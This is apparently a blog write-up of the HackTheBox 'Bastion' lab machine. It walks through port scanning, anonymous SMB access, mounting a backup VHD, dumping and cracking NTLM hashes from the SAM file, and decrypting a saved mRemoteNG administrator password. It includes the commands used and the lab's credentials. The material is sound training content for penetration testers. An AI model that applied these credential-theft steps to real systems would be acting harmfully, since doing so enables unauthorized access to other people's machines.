HackTheBox: Bastion

The first step is to Nmap the machine to find which services are running:

root@kali://root/Documents/bastion# cat scan 
# Nmap 7.70 scan initiated Wed Aug  7 10:36:31 2019 as: nmap -A -oN scan -p- 10.10.10.134
Nmap scan report for 10.10.10.134
Host is up (0.032s latency).
Not shown: 65522 closed ports
PORT      STATE SERVICE      VERSION
22/tcp    open  ssh          OpenSSH for_Windows_7.9 (protocol 2.0)
| ssh-hostkey: 
|   2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)
|   256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA)
|_  256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49668/tcp open  msrpc        Microsoft Windows RPC
49669/tcp open  msrpc        Microsoft Windows RPC
49670/tcp open  msrpc        Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.70%E=4%D=8/7%OT=22%CT=1%CU=34774%PV=Y%DS=2%DC=T%G=Y%TM=5D4A9C1A
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=10E%II=I%TS=A)SEQ(SP=103%GCD
OS:=1%ISR=10E%CI=I%II=I%TS=A)SEQ(SP=103%GCD=1%ISR=10E%TS=A)OPS(O1=M54DNW8ST
OS:11%O2=M54DNW8ST11%O3=M54DNW8NNT11%O4=M54DNW8ST11%O5=M54DNW8ST11%O6=M54DS
OS:T11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=2000)ECN(R=Y%DF=Y%T=8
OS:0%W=2000%O=M54DNW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(
OS:R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F
OS:=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T
OS:=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=
OS:0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=
OS:164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z)

Network Distance: 2 hops
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -39m58s, deviation: 1h09m14s, median: 0s
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Bastion
|   NetBIOS computer name: BASTION\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2019-08-07T11:38:29+02:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2019-08-07 10:38:26
|_  start_date: 2019-08-07 09:01:18

TRACEROUTE (using port 1720/tcp)
HOP RTT      ADDRESS
1   31.07 ms 10.10.12.1
2   31.11 ms 10.10.10.134

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Aug  7 10:38:34 2019 -- 1 IP address (1 host up) scanned in 123.32 seconds

As we can see from the output, we have SSH and some SMB shares. I then run smbmap to find which SMB shares were available:

root@kali:~/Documents/bastion# smbmap -u anonymous -H 10.10.10.134
[+] Finding open SMB ports....
[+] Guest SMB session established on 10.10.10.134...
[+] IP: 10.10.10.134:445	Name: 10.10.10.134                                      
  Disk                                                  	Permissions
  ----                                                  	-----------
  ADMIN$                                            	NO ACCESS
  Backups                                           	READ, WRITE
  C$                                                	NO ACCESS
  IPC$                                              	READ ONLY

There are two shares that we have R/W access to. These are Backups and IPC. Backups sounds the most promising so i mounted this share first and started browsing the files to see if anything stood out. I found some VHD files inside the \WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\ folder.

smb: \WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\> dir
  .                                   D        0  Fri Feb 22 12:45:32 2019
  ..                                  D        0  Fri Feb 22 12:45:32 2019
  9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd      A 37761024  Wed Aug  7 15:34:56 2019
  9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd      A 5451853824  Wed Aug  7 15:37:53 2019
  BackupSpecs.xml                     A     1186  Fri Feb 22 12:45:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_AdditionalFilesc3b9f3c7-5e52-4d5e-8b20-19adc95a34c7.xml      A     1078  Fri Feb 22 12:45:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_Components.xml      A     8930  Fri Feb 22 12:45:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_RegistryExcludes.xml      A     6542  Fri Feb 22 12:45:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer4dc3bdd4-ab48-4d07-adb0-3bee2926fd7f.xml      A     2894  Fri Feb 22 12:45:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer542da469-d3e1-473c-9f4f-7847f01fc64f.xml      A     1488  Fri Feb 22 12:45:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_Writera6ad56c2-b509-4e6c-bb19-49d8f43532f0.xml      A     1484  Fri Feb 22 12:45:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerafbab4a2-367d-4d15-a586-71dbb18f8485.xml      A     3844  Fri Feb 22 12:45:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerbe000cbe-11fe-4426-9c58-531aa6355fc4.xml      A     3988  Fri Feb 22 12:45:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_Writercd3f2362-8bef-46c7-9181-d62844cdc0b2.xml      A     7110  Fri Feb 22 12:45:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_Writere8132975-6f93-4464-a53e-1050253ae220.xml      A  2374620  Fri Feb 22 12:45:32 2019

    7735807 blocks of size 4096. 2767174 blocks available
smb: \WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\>

I downloaded the largest of the VHD files as this is more likely to contain something of interest. Once downloaded i mounted the file using vhdimount to /mnt/test

root@kali:~/Documents/bastion/smb/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351# vhdimount 9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd /mnt/test/
vhdimount 20190309
root@kali:~/Documents/bastion/smb/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351# cd /mnt/test/
root@kali:/mnt/test# ls
vhdi1

As you can see from the output, this has produced an image file in /mnt/test. This now needs to be mounted so the filesystem can be accessed. Running fdisk -l on the image file provides us more information.

root@kali:/mnt/test# fdisk -l vhdi1
Disk vhdi1: 100.1 MiB, 104970240 bytes, 205020 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0x00000000

Device     Boot Start    End Sectors  Size Id Type
vhdi1p1           128 204927  204800  100M  7 HPFS/NTFS/exFAT

Now we know the start point of the filesystem, and the sector size. we can carve out the partition and mount it.

root@kali:/mnt/test# mount -o ro,noload,offset=65536 vhdi1 /mnt/just/

The offset for mounting this partition is the start point * the sector size. So in this case it is 128*512 = 65536.

I then went to /mnt/just/Windows/System32/config to dump the password hashes from the SAM file. I did this using pwdump.

root@kali:/mnt/tmp# cd /mnt/just/Windows/System32/config
root@kali:/mnt/just/Windows/System32/config# pwdump SYSTEM SAM 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::

You are unable to dump the Administrator hash using this method. However the L4mpje NTLM hash is present. I copied the hash and entered it into hashkiller.co.uk. the precomputed hash was returned successfully.

Cracker Results:
                    26112010952d963c8dc4217daec986d9 NTLM bureaulampje

Now with this password i was able to login to the machine via SSH, browse to the desktop and capture the user flag.

root@kali:/mnt/just/Windows/System32/config# ssh l4mpje@10.10.10.134
l4mpje@10.10.10.134's password: 

Microsoft Windows [Version 10.0.14393]                                                                            
(c) 2016 Microsoft Corporation. All rights reserved.                                                              

l4mpje@BASTION C:\Users\L4mpje>   

l4mpje@BASTION C:\Users\L4mpje>cd Desktop                                                                         

l4mpje@BASTION C:\Users\L4mpje\Desktop>dir                                                                        
 Volume in drive C has no label.                                                                                  
 Volume Serial Number is 0CB3-C487                                                                                

 Directory of C:\Users\L4mpje\Desktop                                                                             

22-02-2019  16:27    <DIR>          .                                                                             
22-02-2019  16:27    <DIR>          ..                                                                            
23-02-2019  10:07                32 user.txt                                                                      
               1 File(s)             32 bytes                                                                     
               2 Dir(s)  11.383.808.000 bytes free                                                                

l4mpje@BASTION C:\Users\L4mpje\Desktop>more user.txt                                                              
[REDACTED]

The next step is privilege escalation to try and get an Administrator prompt. I looked around on the machine and found that a piece of software called mRemoteNG¬† had been installed. This is a frontend for software like putty, RDP, VNC etc… And it has the ability to save credentials of frequently visited remote sessions for easy access in the future. One problem with this however is that its been found to store the credentials insecurely. Scripts are available which allows you to enter the encrypted password and outputs the plaintext result.

The passwords are stored in an XML file called confCons.xml in AppData\Roaming\mRemoteNG.

l4mpje@BASTION C:\Users\L4mpje\AppData\Roaming\mRemoteNG>dir                                                      
 Volume in drive C has no label.                                                                                  
 Volume Serial Number is 0CB3-C487                                                                                

 Directory of C:\Users\L4mpje\AppData\Roaming\mRemoteNG                                                           

22-02-2019  15:03    <DIR>          .                                                                             
22-02-2019  15:03    <DIR>          ..                                                                            
22-02-2019  15:03             6.316 confCons.xml                                                                  
22-02-2019  15:02             6.194 confCons.xml.20190222-1402277353.backup                                       
22-02-2019  15:02             6.206 confCons.xml.20190222-1402339071.backup                                       
22-02-2019  15:02             6.218 confCons.xml.20190222-1402379227.backup                                       
22-02-2019  15:02             6.231 confCons.xml.20190222-1403070644.backup                                       
22-02-2019  15:03             6.319 confCons.xml.20190222-1403100488.backup                                       
22-02-2019  15:03             6.318 confCons.xml.20190222-1403220026.backup                                       
22-02-2019  15:03             6.315 confCons.xml.20190222-1403261268.backup                                       
22-02-2019  15:03             6.316 confCons.xml.20190222-1403272831.backup                                       
22-02-2019  15:03             6.315 confCons.xml.20190222-1403433299.backup                                       
22-02-2019  15:03             6.316 confCons.xml.20190222-1403486580.backup                                       
22-02-2019  15:03                51 extApps.xml                                                                   
22-02-2019  15:03             5.217 mRemoteNG.log                                                                 
22-02-2019  15:03             2.245 pnlLayout.xml                                                                 
22-02-2019  15:01    <DIR>          Themes                                                                        
              14 File(s)         76.577 bytes                                                                     
               3 Dir(s)  11.334.410.240 bytes free

I opened confCons.xml to retrieve the encrypted password. Its visible very near the top and is encoded in base64.

<?xml version="1.0" encoding="utf-8"?>
<mrng:Connections xmlns:mrng="http://mremoteng.org" Name="Connections" Export="false" EncryptionEngine="AES" BlockCipherMode="GCM" KdfIterations="1000" FullFileEncryption="false" Protected="ZSvKI7j224Gf/twXpaP5G2QFZMLr1iO1f5JKdtIKL6eUg+eWkL5tKO886au0ofFPW0oop8R8ddXKAx4KK7sAk6AA" ConfVersion="2.6">
    <Node Name="DC" Type="Connection" Descr="" Icon="mRemoteNG" Panel="General" Id="500e7d58-662a-44d4-aff0-3a4f547a3fee" Username="Administrator" Domain="" Password="aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==" Hostname="127.0.0.1" Protocol="RDP" PuttySession="Default Settings" Port="3389" ConnectToConsole="false" UseCredSsp="true" RenderingEngine="IE" ICAEncryptionStrength="EncrBasic" RDPAuthenticationLevel="NoAuth" RDPMinutesToIdleTimeout="0" RDPAlertIdleTimeout="false" LoadBalanceInfo="" Colors="Colors16Bit"

I then used mremoteng_decrypt.py to decrypt the base64 encoded password from the XML file.

root@kali:~/Documents/bastion# ./mremoteng_decrypt.py -s aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==
Password: thXLHM96BeKL0ER2
root@kali:~/Documents/bastion#

With this password i was able to login again via SSH, but this time as Administrator.

root@kali:~/Documents/bastion# ssh administrator@10.10.10.134
administrator@10.10.10.134's password: 

Microsoft Windows [Version 10.0.14393]                                                                            
(c) 2016 Microsoft Corporation. All rights reserved.                                                              

administrator@BASTION C:\Users\Administrator>cd Desktop                                                           

administrator@BASTION C:\Users\Administrator\Desktop>more root.txt                                                
[REDACTED]

Leave a Reply

Your email address will not be published. Required fields are marked *